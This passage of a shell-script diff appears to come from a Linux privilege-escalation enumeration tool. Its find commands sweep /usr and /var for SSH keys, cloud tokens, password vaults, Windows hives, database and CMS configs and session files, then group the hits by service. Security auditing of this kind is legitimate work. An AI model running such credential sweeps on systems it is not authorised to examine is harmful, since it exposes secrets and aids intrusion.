\"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \"sess_*\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_USR=`eval_bckgrd "find /usr -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \"ssh*config\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_VAR=`eval_bckgrd "find /var -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \"sess_*\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` wait # Always wait at the end CONT_THREADS=0 #Reset the threads counter #GENERATE THE STORAGES OF THE FOUND FILES - PSTORAGE_SYSTEMD=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/usr|^/lib64|^/opt|^/systemd|^/bin|^/etc|^/lib32|^/private|^/run|^/tmp|^/lib|^/system|^/applications|^/.cache|^/srv|^/snap|^$GREPHOMESEARCH|^/sbin|^/sys|^/var|^/mnt|^/cdrom|^/media" | grep -E ".*\.service$" | sort | uniq | head -n 70) - PSTORAGE_TIMER=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/usr|^/lib64|^/opt|^/systemd|^/bin|^/etc|^/lib32|^/private|^/run|^/tmp|^/lib|^/system|^/applications|^/.cache|^/srv|^/snap|^$GREPHOMESEARCH|^/sbin|^/sys|^/var|^/mnt|^/cdrom|^/media" | grep -E ".*\.timer$" | sort | uniq | head -n 70) - PSTORAGE_SOCKET=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/usr|^/lib64|^/opt|^/systemd|^/bin|^/etc|^/lib32|^/private|^/run|^/tmp|^/lib|^/system|^/applications|^/.cache|^/srv|^/snap|^$GREPHOMESEARCH|^/sbin|^/sys|^/var|^/mnt|^/cdrom|^/media" | grep -E ".*\.socket$" | sort | uniq | head -n 70) - PSTORAGE_DBUS=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/etc" | grep -E "system\.d$" | sort | uniq | head -n 70) - PSTORAGE_MYSQL=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -v -E 'mysql/mysql' | grep -E '^/etc/.*mysql|/usr/var/lib/.*mysql|/var/lib/.*mysql' | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "mysql$" | sort | uniq | head -n 70) - PSTORAGE_MARIADB=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "mariadb\.cnf$|debian\.cnf$" | sort | uniq | head -n 70) - PSTORAGE_POSTGRESQL=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "pgadmin.*\.db$|pg_hba\.conf$|postgresql\.conf$|pgsql\.conf$" | sort | uniq | head -n 70) - PSTORAGE_APACHE=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "sites-enabled$|000-default\.conf$|php\.ini$" | sort | uniq | head -n 70) - PSTORAGE_PHP_SESSIONS=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E '/tmp/.*sess_.*|/var/tmp/.*sess_.*' | grep -E "^/private|^/tmp|^/mnt|^/var" | grep -E "sess_.*$" | sort | uniq | head -n 70) - PSTORAGE_PHP_FILES=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*config.*\.php$|database\.php$|db\.php$|storage\.php$|settings\.php$" | sort | uniq | head -n 70) - PSTORAGE_WORDPRESS=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "wp-config\.php$" | sort | uniq | head -n 70) - PSTORAGE_DRUPAL=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E '/default/settings.php' | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "settings\.php$" | sort | uniq | head -n 70) - PSTORAGE_MOODLE=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E 'moodle/config.php' | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "config\.php$" | sort | uniq | head -n 70) - PSTORAGE_TOMCAT=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "tomcat-users\.xml$" | sort | uniq | head -n 70) - PSTORAGE_MONGO=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "mongod.*\.conf$" | sort | uniq | head -n 70) - PSTORAGE_SUPERVISORD=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "supervisord\.conf$" | sort | uniq | head -n 70) - PSTORAGE_CESI=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "cesi\.conf$" | sort | uniq | head -n 70) - PSTORAGE_RSYNC=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "rsyncd\.conf$|rsyncd\.secrets$" | sort | uniq | head -n 70) - PSTORAGE_HOSTAPD=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "hostapd\.conf$" | sort | uniq | head -n 70) - PSTORAGE_ANACONDA_KS=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E 